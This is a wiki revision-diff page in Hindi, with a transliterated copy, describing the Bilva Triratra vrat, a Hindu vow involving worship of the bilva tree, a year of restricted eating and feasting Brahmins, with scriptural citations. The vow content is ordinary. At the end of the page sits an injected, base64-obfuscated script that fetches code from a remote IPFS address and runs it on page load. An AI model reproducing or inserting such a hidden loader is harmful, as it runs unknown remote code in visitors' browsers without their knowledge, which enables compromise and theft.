Difference between revisions of "बिल्वत्रिरात्र व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (बिल्वत्रिरात्रव्रत का नाम बदलकर बिल्वत्रिरात्र व्रत कर दिया गया है)
 
(8 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
*[[ज्येष्ठा नक्षत्र]] से युक्त [[ज्येष्ठ]] [[पूर्णिमा]] पर सरसों से युक्त जल से स्नान कर, बिल्व वृक्ष पर जल छिड़कना और उसे गंध आदि से पूजना चाहिए।  
+
*[[ज्येष्ठा नक्षत्र]] से युक्त [[ज्येष्ठ पूर्णिमा]] पर सरसों से युक्त जल से स्नान कर, [[बिल्व वृक्ष]] पर जल छिड़कना और उसे गंध आदि से पूजना चाहिए।  
 
*एक वर्ष तक नक्त विधि से आहार लेना चाहिए।  
 
*एक वर्ष तक नक्त विधि से आहार लेना चाहिए।  
 
*[[वर्ष]] के अन्त में बिल्व वृक्ष के पास में बाँस के पात्र में बालू जौ, चावल, तिल आदि भर कर पहुँचना तथा पुष्पों आदि से [[उमा]] एवं [[महेश्वर]] की पूजा वैधव्याभाव, सम्पत्ति, स्वास्थ्य, पुत्रादि के लिए मन्त्र के साथ में बिल्व को सम्बोधित करना चाहिए।  
 
*[[वर्ष]] के अन्त में बिल्व वृक्ष के पास में बाँस के पात्र में बालू जौ, चावल, तिल आदि भर कर पहुँचना तथा पुष्पों आदि से [[उमा]] एवं [[महेश्वर]] की पूजा वैधव्याभाव, सम्पत्ति, स्वास्थ्य, पुत्रादि के लिए मन्त्र के साथ में बिल्व को सम्बोधित करना चाहिए।  
Line 6: Line 6:
 
*[[उपवास]] के साथ में [[त्रयोदशी]] से [[पूर्णिमा]] तक तीन दिन तक जागरण करना चाहिए।   
 
*[[उपवास]] के साथ में [[त्रयोदशी]] से [[पूर्णिमा]] तक तीन दिन तक जागरण करना चाहिए।   
 
*दूसरे दिन प्रातः स्नान कर, वस्त्रों, आभूषण आदि से आचार्य को सम्मान; 16, 8 या 4 सपत्नीक ब्राह्मणों को भोजन कराना चाहिए।   
 
*दूसरे दिन प्रातः स्नान कर, वस्त्रों, आभूषण आदि से आचार्य को सम्मान; 16, 8 या 4 सपत्नीक ब्राह्मणों को भोजन कराना चाहिए।   
*इस व्रत से [[उमा]], [[लक्ष्मी]], [[शची]], [[सावित्री]] एवं [[सीता]] को क्रम से [[शिव]], [[कृष्ण]], [[इन्द्र]], [[ब्रह्मा]] एवं [[राम]] ऐसे पतियों की प्राप्ति हुई <ref>हेमाद्रि (व्रत0 2, 308-312, स्कन्दपुराण से उद्धरण)</ref> ; <ref>स्मृतिकौस्तुभ (123-124)</ref>
+
*इस व्रत से [[उमा]], [[लक्ष्मी]], [[शची]], [[सावित्री]] एवं [[सीता]] को क्रम से [[शिव]], [[कृष्ण]], [[इन्द्र]], [[ब्रह्मा]] एवं [[राम]] ऐसे पतियों की प्राप्ति हुई।<ref>हेमाद्रि (व्रत0 2, 308-312, स्कन्दपुराण से उद्धरण</ref>, <ref>स्मृतिकौस्तुभ (123-124</ref>
  
 
 
{{लेख प्रगति
 
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
{{पर्व और त्योहार}}
+
{{पर्व और त्योहार}}{{व्रत और उत्सव}}
{{व्रत और उत्सव}}
+
[[Category:व्रत और उत्सव]][[Category:संस्कृति कोश]][[Category:पर्व और त्योहार]]
 
 
[[Category:व्रत और उत्सव]]
 
[[Category:संस्कृति कोश]]  
 
[[Category:पर्व और त्योहार]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 09:11, 2 June 2015

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • jyeshtha nakshatr se yukt jyeshth poornima par sarasoan se yukt jal se snan kar, bilv vriksh par jal chhi dakana aur use gandh adi se poojana chahie.
  • ek varsh tak nakt vidhi se ahar lena chahie.
  • varsh ke ant mean bilv vriksh ke pas mean baans ke patr mean baloo jau, chaval, til adi bhar kar pahuanchana tatha pushpoan adi se uma evan maheshvar ki pooja vaidhavyabhav, sampatti, svasthy, putradi ke lie mantr ke sath mean bilv ko sambodhit karana chahie.
  • sahasroan bilv dal se hom kar, sone ke phaloan ke sath chaandi ka ek bilv vriksh banana chahie.
  • upavas ke sath mean trayodashi se poornima tak tin din tak jagaran karana chahie.
  • doosare din pratah snan kar, vastroan, abhooshan adi se achary ko samman; 16, 8 ya 4 sapatnik brahmanoan ko bhojan karana chahie.
  • is vrat se uma, lakshmi, shachi, savitri evan sita ko kram se shiv, krishna, indr, brahma evan ram aise patiyoan ki prapti huee.[1], [2]

tika tippani aur sandarbh

  1. hemadri (vrat0 2, 308-312, skandapuran se uddharan
  2. smritikaustubh (123-124

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>